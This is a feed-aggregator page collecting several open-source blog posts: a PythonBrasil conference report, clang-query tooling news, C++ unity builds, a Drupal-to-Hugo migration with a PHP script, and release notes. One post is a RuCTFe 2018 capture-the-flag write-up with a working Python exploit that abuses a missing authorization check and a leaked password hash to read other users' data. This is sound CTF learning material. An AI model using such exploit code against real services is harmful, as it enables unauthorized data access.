
When attending it for the second time, I didn't go alone. Daniela Petruzalek had her talk accepted. Claudia, also from PyLadies Porto Alegre, was able to go, for the first time, thanks to the support of the PyLadies Brazil crowdfunding campaign. To me, one of the most memorable things about this PythonBrasil was "The (unofficial) PyLadies House", where I stayed. It was a huge house that we rented and shared between about 18 people to help with the accomodation costs for all of us. We shared breakfasts and rides and stories. We watched other PyLadies rehearse their talks, made lightning tech talks late at the night and we even had a birthday party!

So, this year? The idea of encouraging PyLadies POA submissions, something that had came up almost spontaneously last year, matured and we have worked to make Pyladies Porto Alegre 2nd Birthday Party an all-day event with that purpose. The schedule? Lightning talks about Python projects from its members, talks about experiences as participants and as speakers at Python Brasil and... we also had a help from Vinta Software's Flavio Juvenal, who acted as mentor to the women who were considering to submit an activity to PythonBrasil. He even made a great Github repo with a proposal checklist to assist us - and he made himself available for reviewing the proposals we wrote.

The result? We had more than 6 women from PyLadies Porto Alegre with activities accepted to PythonBrasil[14]. Some of them even had more than one activity (tutorial and talk) accepted.

I was among the ones who had been accepted. Ever since attending the conference for the first time, it had been a goal of mine to give a talk at PythonBrasil. But not any talk. I wanted for it to be a technical talk. At last, what I learned during Outreachy and how I had used it for a real task in a job finally gave me the confidance to do so. I felt ready, so I submitted and I was accepted.

I made my way to Natal, the capital of the Rio Grande do Norte (RN) state (in the Northeast of Brazil) two days before the conference was to start, since it was the cheapest ticket I could find. Besides, the PyLadiesBRConf was scheduled to happen on the day before and I was hoping I would be able to attend. PyLadiesBRConf was a full day of talks organized by what one could have called "the original PyLadies Brazil", since the Pyladies community in Brazil actually started in Natal and was named so (afterwards we started naming the group with cities' names).

The PythonBrasil[14] conference

On the next day, PythonBrasil[14] started. It was the biggest PythonBrasil to happen yet, with over 700 atendees (plus staff). Like many PyCons, the conference days are usually split between tutorials, talks and sprints.

Day 1 - tutorials

The tutorials have free admitance and are open to anyone to attend (no matter if they have bought a ticket to the conference or not). Unfortunatelly, due to the capacity of the rooms where they would be held, there was a limit for 100 registrations for each tutorial. When I went to register for the tutorials of the first day, they were already all booked. Even so, the tutorial I was most interested in, "Builting REST APIs with Django REST Framework", had to be cancelled anyway because the presenter missed his flight. :( On this first day, I met with a few PyLadies and people from the Python community who were in Natal, I walked on the beach and I focused on the preparation for my talk.

Day 2 - tutorials

I must confess that I had registered for the tutorial on Pandas ("It's not witchcraft, it's Pandas", by Fernando Masanori) merely because Flavio Juvenal had mentioned Pandas on the feedback for my proposal. I had no idea what that was actually about and why would one even use Pandas. By noon on that second day, though, I was so very glad that I did (and that I got a spot in it!). I learned a bit about Pandas and I also learned about how to use Jupyter Notebooks, something I had never tried before either. I found both Pandas and Jupyter easy and interesting and I look forward to do some projects using them.

Back when we (PyLadies) were discussing submissions to PythonBrasil with Professor Masanori, Data Structures was something that both I and another PyLady (Debora) had mentioned we had been meaning to focus on and study more. So, he came up with the idea for a tutorial about it, called: "Data Structures are <3".

On this tutorial, I found it quite interesting learning and playing with recursive functions and with algorithms for searching. I was quite impressed with learning about heapsort (who knew doing such a thing could be so cool?).

Image Licensed CC BY-SA 3.0 Attribution: RolandH

Everything at PythonBrasil (tutorials, talks and sprint) happened in the same hotel. So, after the tutorials were over, I hung around with some of the people of the community who were staying at the same hostel. The organizing team asked for help in putting together the conference kit (bag, t-shirt, IDs and flyers). We made sort of a production line and cut the time considerably short for the volunteer team.

Afterwards, I was still processing everything that I had learned and I wanted to try the new things, so I went back to the hostel to code some more. I confess that I was so hooked that I stayed up until 2 am to create the code with Pandas that I would incorporate in my talk as a bonus content.

Day 3 - talks

On this day, I had the opportunity to meet and socialize with a lot of people who were coming to Python Brasil for the first time. It was particularly delightful to see a lot of students from a public technical school (Instituto Federal) attending the conference with their teachers. They had been given tickets, which allowed them to attend the (otherwise very expensive) conference and I must say that this is the kind of inclusion that I always want to see in tech events.

From the talks, I want to highlight these moments: I learned about Scrapy (which I have been playing around a bit since then), I watched an awesome talk about using Python with Physics (although I don't have a depth knowledge of Physics, I count as a success that I could follow the talk in it's entirety, so cheers to the presenter, Ana Maria, from PyLadies Teresina) and I must mention that I was quite impressed by Elias Dorneles' talk - about developing software for the command line. Even his "slides" were made there - and there was drawings and music too, all made with Python and using the command line!

Day 4 - talks

The second day of talks brought us the much needed talk about AfroPython, a initiative that was created to increase representation of black and native brazilian people in our community.

A talk that gathered a lot of attention (and overcrowded the room it was being given at!) was the one about using Python to understand data about suicides to help preventing them. It's a hard subject for many people, but it is one that we definitely need to talk about.

Andreza Rocha's talk "Dear White People (from HR)" also touched a lot of people. She drew from her own experiences as a tech recruiter to question about the homogenity that we (still) have in tech. "Who are the ones who recruit the people?" she asked. "For us to be recruited, we (black people) have to be alive."

It was on this day that a violation of Python Brasil's Code of Conduct happened. After a PyLady gave her talk, a male participant used the time for questions not to ask a question, but to let's say... eulogize the woman who had given the talk... by demeaning all other women who had presented before her and weren't "technical enough" or something like that. Oh, how thick we must make our skin for us to be able to come up to a stage knowing we might to be subjected to a moment like that... I am glad the PyLady was experienced and level-headed enough to own the moment and give him the deserving come back. * sigh * (After the conference, the organization published a note about the CoC violation.)

Contrary to popular belief, yes, I did watch the last keynote of the day, even though it was Facebook's. And it did surprised me. Rainer Alves spoke about the shifts in corporate culture that happened when they merged infrastructure and development people into a "Production Engineering" departament. What I found most relevant, though, was the slide below, about "Blameless postmortens". After all, how to actually correct a malpractice or an error other than working collectivelly to figure out the way? "It's not about what you did, it's about what went wrong."

This was the day we took the official photo of Python Brazil:

It was also the day we took a picture with the women who were at the conference:

Day 5 - talks

Sunday arrived and it was time for: 'But can you open it on Excel?' Exporting to TXT, CSV and JSON with Python ("'Mas dá pra abrir no Excel?'' Exportando para TXT, CSV e JSON com Python"). The focus of my talk was how to export data to those formats using mainly the tools offered by the Python Standard Library. But, as I mentioned before, thanks to what I learned during the PythonBrasil tutorials, I was able to add some extra content and show how the export to CSV could be done with Pandas as well. I was very glad about this, even though I felt like there was so little time to go over all the content I wanted to present (I had time to go through all my slides and for a very brief demonstration, but that was it). I think it went well. I even managed to speak briefly about Free Software (since I don't use Excel, and I made my demonstration with LibreOffice).

When they opened time for questions, I explicitily said "Questions, not comments, please" hoping to avoid mansplaing or another incident like the one that had happened the day before. And I know people judged me for that, but... I am also aware they judged me more harshly because I am a woman. After all, in previous editions we have had male keynotes making the very same comment without people being offended by it.

This did not stop people from coming to talk to me afterwards with comments about their experiences anyway - that was definitely better, because I felt like I could talk to them more properly and personally about it, having more time than the 5 minutes alotted to questions and not having to answer under a full audience's scrutiny.

Other than my own talk, I would like to mention some other talks I attended. There was a talk about advanced functional programming ("Going further than map, filter and reduce"), which is something that I find interesting to have some idea about it, even though I don't quite fully grasp yet. There was also the PyLadies' talk, where a group representing each region of Brazil with a PyLadies group talked about the work we have been doing. Andressa went on for PyLadies Porto Alegre and talked about all the work we have been doing in particular regarding all the Django Girls workshops we have helped at in Rio Grande do Sul since the last PythonBrasil.

Ana Paula made a fun talk about Genetic Algorithm with Python, which uses the language to work with Biology data. Another subject that I am not very familiar with, but that I found quite interesting. And I also saw Camilla Martins live coding to run Python with Node.js on the big stage.

During the lightning talks, something amazing happened: the Instituto Federal students went up on the stage and talked about their experience at PythonBrasil using a regional sung-poetry called Cordel. It was really remarkable.

Also during the lightning talks, we had Thrycia Oliveira, a former participant of Django Girls, calling to attention the fact that we need to have spaces that are inclusive to parents in the community, in particular to moms. She said that PythonBrasil organization tried to arrange so, and she thanked them for that, but it had not been possible. I also remember when she told me about her participation in Python Nordeste (a regional conference that preceeded PythonBrasil) and how she had to alternate with her husband the days she went to, because one of them had to stay at home to watch over their kids (it wasn't really a kids-inclusive event).

This day ended with Betina's keynote "Does this algorithm have a soul?", a very relevant question for the state of software development today. Her talk spoke to me and to a lot of people in the audience and I can't picure a more welcoming community to be given to.

Day 6 - sprints

Sadly, Python Brazil had to come to an end. Day 6 happened on a Monday, and that meant that the majority of the people, including almost all the Pyladies, had already returned home. :( For personal reasons that I would rather not talk about publicly, I chose not to take part on the coding sprint to help with APyB's site. Instead, because I am looking for work, I used this day mostly for networking and applying to jobs I had heard about during PythonBrasil. I don't have wifi at home and I need to take any opportunity I can get to use the internet to send CVs and taking technical tests, so that is what I did.

Wrapping things up...

And, of course, to finish this post I ought to mention the beach... On my last two days in Natal, I was gifted with the awesomeness that it is the ocean at Ponta Negra during the full moon. There are no words to describe the beauty of it (I am sorry I couldn't take a good picture of it).

Thank you notes

I know this post ended up being extensive, but how can one summarize an experience with an event as huge as PythonBrasil? It's hard. I think it's safe to say that to be part of something like that has a lasting impact in my life. All the technical content I have heard about gives me motivation to keep studying and learning new things. All the people I have met, friends old and new, give meaning to the work to make the Python community more open and inclusive.

So, I cannot thank Outreachy enough for making my participation in Python Brasil possible!

This whole journey would not be possible without the awesome people below, so I would like to also thank:

  • My Outreachy mentors Daniel Pocock and Bruno for the support during the internship and beyond
  • Flavio Juvenal for the feedback on my proposal and giving the golden tip about Pandas
  • Andreza Rocha for not letting me give up on my dream to go to this PythonBrasil
  • Felipe de Morais and Betina Costa for sitting in the very front row and nodding when I was unsure during my talk
  • Elias Dorneles for the support when applying to Outreachy and for reviewing my slides
  • PyLadies Brazil for being the safety net so many women can rely on
Renata https://rsip22.github.io/blog/ Renata's blog

Stephen Kelly: Future Developments in clang-query

Planet Ubuntu - Dje, 11/11/2018 - 11:46md
Getting started – clang-tidy AST Matchers

Over the last few weeks I published some blogs on the Visual C++ blog about Clang AST Matchers. The series can be found here:

I am not aware of any similar series existing which covers creation of clang-tidy checks, and use of clang-query to inspect the Clang AST and assist in the construction of AST Matcher expressions. I hope the series is useful to anyone attempting to write clang-tidy checks. Several people have reported to me that they have previously tried and failed to create clang-tidy extensions, due to various issues, including lack of information tying it all together.

Other issues with clang-tidy include the fact that it relies on the “mental model” a compiler has of C++ source code, which might differ from the “mental model” of regular C++ developers. The compiler needs to have a very exact representation of the code, and needs to have a consistent design for the class hierarchy representing each standard-required feature. This leads to many classes and class hierarchies, and a difficulty in discovering what is relevant to a particular problem to be solved.

I noted several problems in those blog posts, namely:

  • clang-query does not show AST dumps and diagnostics at the same time<
  • Code completion does not work with clang-query on Windows
  • AST Matchers which are appropriate to use in contexts are difficult to discover
  • There is no tooling available to assist in discovery of source locations of AST nodes

Last week at code::dive in Wroclaw, I demonstrated tooling solutions to all of these problems. I look forward to video of that talk (and videos from the rest of the conference!) becoming available.

Meanwhile, I’ll publish some blog posts here showing the same new features in clang-query and clang-tidy.

clang-query in Compiler Explorer

Recent work by the Compiler Explorer maintainers adds the possibility to use source code tooling with the website. The compiler explorer contains new entries in a menu to enable a clang-tidy pane.

clang-tidy in Compiler Explorer

I demonstrated use of compiler explorer to use the clang-query tool at the code::dive conference, building upon the recent work by the compiler explorer developers. This feature will get upstream in time, but can be used with my own AWS instance for now. This is suitable for exploration of the effect that changing source code has on match results, and orthogonally, the effect that changing the AST Matcher has on the match results. It is also accessible via cqe.steveire.com.

It is important to remember that Compiler Explorer is running clang-query in script mode, so it can process multiple let and match calls for example. The new command set print-matcher true helps distinguish the output from the matcher which causes the output. The help command is also available with listing of the new features.

The issue of clang-query not printing both diagnostic information and AST information at the same time means that users of the tool need to alternate between writing

set output diag

and

set output dump

to access the different content. Recently, I committed a change to make it possible to enable both output and diag output from clang-query at the same time. New commands follow the same structure as the set output command:

enable output dump disable output dump

The set output <feature> command remains as an “exclusive” setting to enable only one output feature and disable all others.

Dumping possible AST Matchers

This command design also enables the possibility of extending the features which clang-query can output. Up to now, developers of clang-tidy extensions had to inspect the AST corresponding to their source code using clang-query and then use that understanding of the AST to create an AST Matcher expression.

That mapping to and from the AST “mental model” is not necessary. New features I am in the process of upstreaming to clang-query enable the output of AST Matchers which may be used with existing bound AST nodes. The command

enable output matcher

causes clang-query to print out all matcher expressions which can be combined with the bound node. This cuts out the requirement to dump the AST in such cases.

Inspecting the AST is still useful as a technique to discover possible AST Matchers and how they correspond to source code. For example if the functionDecl() matcher is already known and understood, it can be dumped to see that function calls are represented by the CallExpr in the Clang AST. Using the callExpr() AST Matcher and dumping possible matchers to use with it leads to the discovery that callee(functionDecl()) can be used to determine particulars of the function being called. Such discoveries are not possible by only reading AST output of clang-query.

Dumping possible Source Locations

The other important discovery space in creation of clang-tidy extensions is that of Source Locations and Source Ranges. Developers creating extensions must currently rely on the documentation of the Clang AST to discover available source locations which might be relevant. Usually though, developers have the opposite problem. They have source code, and they want to know how to access a source location from the AST node which corresponds semantically to that line and column in the source.

It is important to make use a semantically relevant source location in order to make reliable tools which refactor at scale and without human intervention. For example, a cursory inspection of the locations available from a FunctionDecl AST node might lead to the belief that the return type is available at the getBeginLoc() of the node.

However, this is immediately challenged by the C++11 trailing return type feature, where the actual return type is located at the end. For a semanticallly correct location, you must currently use

getTypeSourceInfo()->getTypeLoc().getAs().getReturnLoc().getBeginLoc()

It should be possible to use getReturnTypeSourceRange(), but a bug in clang prevents that as it does not appreciate the trailing return types feature.

Once again, my new output feature of clang-query presents a solution to this discovery problem. The command

enable output srcloc

causes clang-query to output the source locations by accessor and caret corresponding to the source code for each of the bound nodes. By inspecting that output, developers of clang-tidy extensions can discover the correct expression (usually via the clang::TypeLoc heirarchy) corresponding to the source code location they are interested in refactoring.

Next Steps

I have made many more modifications to clang-query which I am in the process of upstreaming. My Compiler explorer instance is listed as the ‘clang-query-future’ tool, while the clang-query-trunk tool runs the current trunk version of clang-query. Both can be enabled for side-by-side comparison of the future clang-query with the exising one.

Jussi Pakkanen: Compile any C++ program 10× faster with this one weird trick!

Planet GNOME - Dje, 11/11/2018 - 11:09md
tl/dr: Is it unity builds? Yes.
I would like to know more!At work I have to compile a large code base from scratch fairly often. One of the components it has is a 3D graphics library. It takes around 2 minutes 15 seconds to compile using an 8 core i7. After a while I got bored with this and converted the system to use a unity build. In all simplicity what that means is that if you have a target consisting of files foo.cpp, bar.cpp, baz.cpp etc you create a cpp file with the following contents:
#include<foo.cpp>#include<bar.cpp>#include<baz.cpp>
Then you would tell the build system to build that instead of the individual files. With this method the compile time dropped down to 1m 50s which does not seem like that much of a gain but the compilation used only one CPU core. The remaining 7 are free for other work. If the project had 8 targets of roughly the same size, building them incrementally would take 18 minutes. With unity builds they would take the exact same 1m 50s assuming perfect parallelisation, which happens fairly often in practice.Wait, what? How is this even?The main reason that C++ compiles slowly has to do with headers. Merely including a few headers in the standard library brings in tens or hundreds of thousands of lines of code that must be parsed, verified, converted to an AST and codegenerated in every translation unit. This is extremely wasteful especially given that most of that work is not used but is instead thrown away.
With an Unity build every #include is processed only once regardless of how many times it is used in the component source files.
Basically this amounts to a caching problem, which is one of the two really hard problems in computer science in addition to naming things and off by one errors.Why is this not used by everybody then?There are several downsides and problems. You can't take any old codebase and compile it as a unity build. The first blocker is that things inside source files leak into other ones since they are all textually included one after the other.. For example if you have two files and each of them declares a static function with the same name, it will lead to name clashes and a compilation failure. Similarly things like using namespace std declarations leak from one file to another causing havoc.
But perhaps the biggest problem is that every recompilation takes the same time. An incremental rebuild where one file has changed takes a few seconds or so whereas a unity builds takes the full 1m 50s every time. This is a major roadblock to iterative development and the main reason unity builds are not widely used.A possible workflow with MesonFor simplicity let's assume that we have a project that builds and works with unity builds. Meson has an automatic unity build file generator that can be enabled by setting the value of the unity build option.
This solves the basic build problem but not the incremental one. However usually you'd develop only one target (be it a library, executable or module) and want to build only that one incrementally and everything else as a unity build. This can be done by editing the build definition of the target in question and adding an override option:
executable(..., override_options : ['unity=false'])
Once you are done you can remove the override from the build file to return everything back to normal.How does this tie in with C++ modules?Directly? Not in any way really. However one of the stated advantages of modules has always been faster build times. There are a few module implementations but there is very little public data on how they behave with real world codebases. During a CppCon presentation on modules Google's Chandler Carruth mentioned that in Google's code base modules resulted in 30% build time reduction.
It was not mentioned whether Google uses unity builds internally but they almost certainly don't (based on things such as this bug report on Bazel). If we assume that theirs is the fastest existing "classical" C++ build mechanism, which it probably is, the conclusion is that it is an order of magnitude slower than a unity build on the same source files. A similar performance gap would probably not be tolerated in any other part of the C++ ecosystem.
The shoemaker's children go barefoot.

RuCTFe 2018 laberator

Planet Debian - Dje, 11/11/2018 - 4:33md

Team: FAUST
Crew: izibi, siccegge
CTF: RuCTFe 2018

The service

Webservice written in go. Has some pretty standard functionality (register, login, store a string) with the logic somewhat dispersed between the main webserver in main.go, some stuff in the templates and the websockets endpoint in command_executor.go. Obviously you have to extract the strings ("labels") from the gameserver. Also the phrase stored when creating the account was used to store some more flags.

Client side authentication for labels

Gem from the viewLabel javascript function. For some reason the label's owner is checked client-side after the data was already returned to the client.

let label = JSON.parse(e.data); if (label.Owner !== getLoginFromCookies()) { return; }

And indeed, the websocket view method checks for some valid session but doesn't concern itself with any further validation of access priviledges. As long as you have any valid session and can figure out websockets you can get about any label you like.

"view": func(ex *CommandExecutor, data []byte) ([]byte, error) { var viewData ViewData err := json.Unmarshal(data, &viewData) if err != nil { return nil, createUnmarshallingError(err, data) } cookies := parseCookies(viewData.RawCookies) ok, _ := ex.sm.ValidateSession(cookies) if !ok { return nil, errors.New("invalid session") } label, err := ex.dbApi.ViewLabel(viewData.LabelId) if err != nil { return nil, errors.New(fmt.Sprintf("db request error: %v, labelId=(%v)", err.Error(), viewData.LabelId)) } rawLabel, err := json.Marshal(*label) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, label=(%v)", err.Error(), *label)) } return rawLabel, nil },

Putting things together. The exploit builds an fresh account. It generates some label (to figure out the ID if the most recent labels) and then bulk loads the last 100 labels

#!/usr/bin/env python3 import requests import websocket import json import sys import string import random import base64 def main(): host = sys.argv[1] session = requests.session() password = [i for i in string.ascii_letters] random.shuffle(password) username = ''.join(password[:10]) phrase = base64.b64encode((''.join(password[10:20])).encode()).decode() password = base64.b64encode((''.join(password[20:36])).encode()).decode() x = session.get('http://%s:8888/register?login=%s&phrase=%s&password=%s' % (host,username,phrase,password)) x = session.get('http://%s:8888/login?login=%s&password=%s' % (host,username, password)) raw_cookie = 'login=%s;sid=%s' % (x.cookies['login'], x.cookies['sid']) ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,)) data = {'Text': 'test', 'Font': 'Arial', 'Size': 20, 'RawCookies': raw_cookie} ws.send(json.dumps({"Command": "create", "Data": json.dumps(data)})) # make sure create is already commited before continuing ws.recv() data = {'Offset': 0, 'RawCookies': raw_cookie} ws.send(json.dumps({"Command": "list", "Data": json.dumps(data)})) stuff = json.loads(ws.recv()) lastid = stuff[0]['ID'] for i in range(0 if lastid-100 < 0 else lastid-100, lastid): ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,)) try: data = {'LabelId': i, 'RawCookies': raw_cookie} ws.send(json.dumps({"Command": "view", "Data": json.dumps(data)})) print(json.loads(ws.recv())["Text"]) except Exception: pass if __name__ == '__main__': main() Password Hash

The hash module used is obviously suspect. consists of a binary and a wrapper, freshly uploaded to github just the day before. Also if you create a test account with an short password (say, test) you end up with an hash that contains the password in plain (say, testTi\x02mH\x91\x96U\\I\x8a\xdd). Looking closer, if you register with a password that is exactly 16 characters (aaaaaaaaaaaaaaaa) you end up with an 16 character hash that is identical. This also means the password hash is a valid password for the account.

Listening to tcpdump for a while you'll notice interesting entries:

[{"ID":2,"Login":"test","PasswordHash":"dGVzdFRpAm1IkZZVXEmK3Q==","Phrase":{"ID":0,"Value":""}}]

See the password hash there? Turns out this comes from the regularly scheduled last_users websocket call.

"last_users": func(ex *CommandExecutor, _ []byte) ([]byte, error) { users := ex.dbApi.GetLastUsers() rawUsers, err := json.Marshal(*users) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, users=(%v)", err.Error(), *users)) } return rawUsers, nil },

So call last_users (doesn't even need a session), for all the last 20 users log in and just load all the labels. Good thing passwords are transfered base64 encoded, so no worrying about non-printable characters in the password hash.

Additionally sessions were generated with the broken hash implementation. This probably would have allowed to compute session ids.

Christoph Egger https://weblog.christoph-egger.org/ Christoph's last Weblog entries

Migrating from Drupal to Hugo

Planet Debian - Dje, 11/11/2018 - 12:30md
TL;DR: Migrating my website from Drupal 7 to Hugo

Jump directly to the end titled Migration to Hugo

Initial website

Looking back at my website’s history, the domain was first registered sometime in 2003. Back then, it was mostly a couple of html pages. Being (and still) a novice in web, my website was mostly on ideas from others. IIRC, for the bare html one, I took a lot of look wise details from Miss Garrels’ website.

First blog

My initial blog was self-hosted with a blogging software in PHP, named PivotX The website for it still works, so hopefully the project is still alive. It was pretty good a tool for the purpose. Very lean and had support for data backends in both, MySQL and flat files. The latter was important to me as I wanted to keep it simple.

Drupal

My first interaction with Drupal was with its WSOD. That was it until I revisited it when evaluating different FOSS web tools to build a community site for one of my previous employer.

Back then, we tried multiple tools: Jive, Joomla, Wordpress and many more. But finally, resorted to Drupal. What the requirement was was to have something which would filter content under nested categories. Then, of the many things tried, the only one which seemed to be able to do it was Drupal with its Taxonomy feature, along with a couple of community driven add-on modules.

We built it but there were other challenges. It was hard to find people who were good with Drupal. I remember to have interviewed around 10-15 people, who could take over the web portal and maintain it, and still not able to fill the position. Eventually, I ended up maintaining the portal by myself.

Migrating my website to Drupal

The easiest way to deal with the maintenance was to have one more live portal running Drupal. My website, which back then, had ambitious goals to also serve an online shopping cart, was the perfect candidate. So I migrated my website from PivotX to Drupal 6. Drupal had a nice RSS Import module which was able to pull in most of the content, except the comments on each article. I think that is more a limitation of RSS Feeds. But the only data import path I could find back then was to import content through RSS Feeds.

Initially, Drupal looked like a nice tool. Lots of features and a vibrant community made it very appealing. And I always desired to build some skills Hands-On (that’s how the job market likes it; irrespective of the skills, it is the hands-on that they evaluate) by using Drupal both, at the employer’s community portal and my personal website.

Little did I know that running/maintaining a website is one aspect; where as extending it, is another (mostly expensive) affair.

Drupal 7

That was the first blow. For a project serving as a platform, Drupal was a PITA when dealing with migrations. And it is not about migrations to a different platform. Rather an upgrade from one major release to another.

Having been using Debian for quite some time, this approach from Drupal brought back memories from the past, of when using Red Hat Linux and SuSE Linux distribution; where upgrades were not a common term, and every major release of the distribution people were mostly recommended to re-install.

Similar was the case with Drupal. Every major release, many (core) modules would be dropped. Many add-on modules would lose support. Neither the project nor the community around it, was helpful anymore.

But somehow, I eventually upgraded to Drupal 7. I did lose a lot of functionality. My nested taxonomy was gone and my themes were all broken. For the web novice that I am, it took me some time to fix those issues.

But the tipping point came in with Drupal 8. It took the pain to the next level repeating the same process of dropping modules and breaking functionalities; never did I hear much of backward compatibility on this platform.

Hugo

For quite some time I kept looking for a migration path away from Drupal 7. I did not care what it was as long as it was FOSS, and had an active community around it. The immediate first choice was WordPress. By this time, my web requirements had trimmed down. No more did I have outrageous ideas of building all solutions (Web, Blog, Cart) in a single platform. All I did was mostly blog and had a couple of basic pages.

The biggest problem was migration. WP has a module, that does migration. But, for whatever annoying reason, the free version of it would only pick 7 articles from the total. And it did not import comments. So the annoyance and my limitations with web technologies was still prone to with WP. This migration path did not enthuse me much: it was more like a Hindi idiom: आसमान से गिरे और खजूर में अटके

I also attempted Jekyll and Hugo. My limited initial attempts were disappointing. Jekyll had an import module, which IIRC did not work proper. Similar was the case with Hugo, which has a module listed on its migration page, drupal2hugo, which sets a disappointment in the beginning itself.

With nothing much left, I just kept postponing my (desperate) plans to migrate.

Migration to Hugo

Luckily, I was able to find some kind soul share migration scripts to help migrate from Drupal 7 to Hugo. Not everything could be migrated (I had to let go of comments) but not much was I in a position to wait more.

With very minimal changes to adapt it to my particular setup, I was able to migrate most of my content. Now, my website is running on markdown generated with Hugo. More than the tool, I am happy to have the data available in a much standard format.

If there’s one thing that I’m missing on my website, it is mostly the commenting system. I would love to have a simple way to accept user comments integrated into Hugo itself, which would just append those comments to their respective posts. Hopefully soon, when I have (some more) free time.

<?php define('DRUPAL_ROOT', __DIR__); include_once(DRUPAL_ROOT . '/includes/bootstrap.inc'); drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL); $nids = db_query('SELECT DISTINCT(nid) FROM {node}') ->fetchCol(); $nodes = node_load_multiple($nids); foreach($nodes as $node) { $front_matter = array( 'title' => $node->title, 'date' => date('c', $node->created), 'lastmod' => date('c', $node->changed), 'draft' => 'false', ); if (count($node->taxonomy_vocabulary_2[LANGUAGE_NONE])) { $tags = taxonomy_term_load_multiple( array_column( $node->taxonomy_vocabulary_2[LANGUAGE_NONE], 'tid' ) ); $front_matter['tags'] = array_column($tags, 'name'); } if (count($node->taxonomy_vocabulary_1[LANGUAGE_NONE])) { $cat = taxonomy_term_load_multiple( array_column( $node->taxonomy_vocabulary_1[LANGUAGE_NONE], 'tid' ) ); $front_matter['categories'] = array_column($cat, 'name'); } $path = drupal_get_path_alias('node/'.$node->nid); if ($path != 'node/'.$node->nid) { $front_matter['url'] = '/'.$path; $content_dir = explode('/', $path); $content_dir = end($content_dir); } else { $content_dir = $node->nid; } $content = json_encode( $front_matter, JSON_PRETTY_PRINT|JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE ); $content .= "\n\n"; $tmp_file = '/tmp/node.html'; file_put_contents($tmp_file, $node->body['fr'][0]['value']); $body = shell_exec('html2markdown '.$tmp_file); unlink($tmp_file); //$body = $node->body['fr'][0]['value']; $content .= $body; $dir_name = '/tmp/hugo/content/'.$node->type.'/'.$content_dir; mkdir($dir_name, 0777, true); file_put_contents($dir_name.'/index.md', $content); }

Ritesh Raj Sarraf rrs@researchut.com Debian Blog on RESEARCHUT

20181110-lts-201810

Planet Debian - Sht, 10/11/2018 - 9:47md
My LTS work in October

In October 2018 sadly I just managed to spend 1h working on jessie LTS on:

Today while writing this I also noticed that https://lists.debian.org/debian-lts-announce/2018/10/threads.html currently misses DLAs 1532 until DLA 1541, which I have just reported to the #debian-lists IRC channel and as #913426. Update: as that bug was closed quickly, I guess instead we need to focus on #859123 and #859122, so that DLAs are accessable to everyone in future.

Holger Levsen http://layer-acht.org/thinking/ Any sufficiently advanced thinking is indistinguishable from madness

RcppArmadillo 0.9.200.4.0

Planet Debian - Sht, 10/11/2018 - 9:01md

A new RcppArmadillo release, now at 0.9.200.4.0, based on the new Armadillo release 9.200.4 from earlier this week, is now on CRAN, and should get to Debian very soon.

Armadillo is a powerful and expressive C++ template library for linear algebra aiming towards a good balance between speed and ease of use with a syntax deliberately close to a Matlab. RcppArmadillo integrates this library with the R environment and language–and is widely used by (currently) 532 (or 31 more since just the last release!) other packages on CRAN.

This release once again brings a number of improvements, see below for details.

Changes in RcppArmadillo version 0.9.200.4.0 (2018-11-09)
  • Upgraded to Armadillo release 9.200.4 (Carpe Noctem)

    • faster handling of symmetric positive definite matrices by rcond()

    • faster transpose of matrices with size ≥ 512x512

    • faster handling of compound sparse matrix expressions by accu(), diagmat(), trace()

    • faster handling of sparse matrices by join_rows()

    • expanded sign() to handle scalar arguments

    • expanded operators (*, %, +, −) to handle sparse matrices with differing element types (eg. multiplication of complex matrix by real matrix)

    • expanded conv_to() to allow conversion between sparse matrices with differing element types

    • expanded solve() to optionally allow keeping solutions of systems singular to working precision

    • workaround for gcc and clang bug in C++17 mode

  • Commented-out sparse matrix test consistently failing on the fedora-clang machine CRAN, and only there. No fix without access.

  • The 'Unit test' vignette is no longer included.

Courtesy of CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Dirk Eddelbuettel http://dirk.eddelbuettel.com/blog Thinking inside the box

Julian Sparber: Purism Fractal sponsorship

Planet GNOME - Sht, 10/11/2018 - 11:08pd

I’m happy to announce that Purism agreed to sponsor my work on Fractal for the next couple of weeks. I will polish the room history and drastically improve the UX/UI around scrolling, loading messages etc. which will make Fractal feel much nicer. As part of this I will also clean up and refactor the current code. On my agenda is the following:

Smooth history loading

Loading old messages in the history is currently a bit jarring, because the scroll position isn’t preserved when new messages come in. I’d like to address this by loading messages outside the viewport, making it so that the user isn’t even aware that more messages are being loaded most of the time. This is a crucial part of why modern messaging apps feel so nice.

Faster message rendering

There are some inefficiencies in how messages are currently rendered, which make showing messages not as smooth as it could be. Fixing this could improve the experience of sending/receiving messages significantly.

 “New messages” behavior
  • Re-add a “New messages” divider, since it was lost as part of the big history refactor I recently completed
  • Scroll to last seen message when opening app instead of most recent message
  • Fix bugs in current behavior and make sure the divider always shows up
Add day label

Add a label with the day/date at the beginning of every new day, like other messaging apps do.

Faqet

Subscribe to AlbLinux agreguesi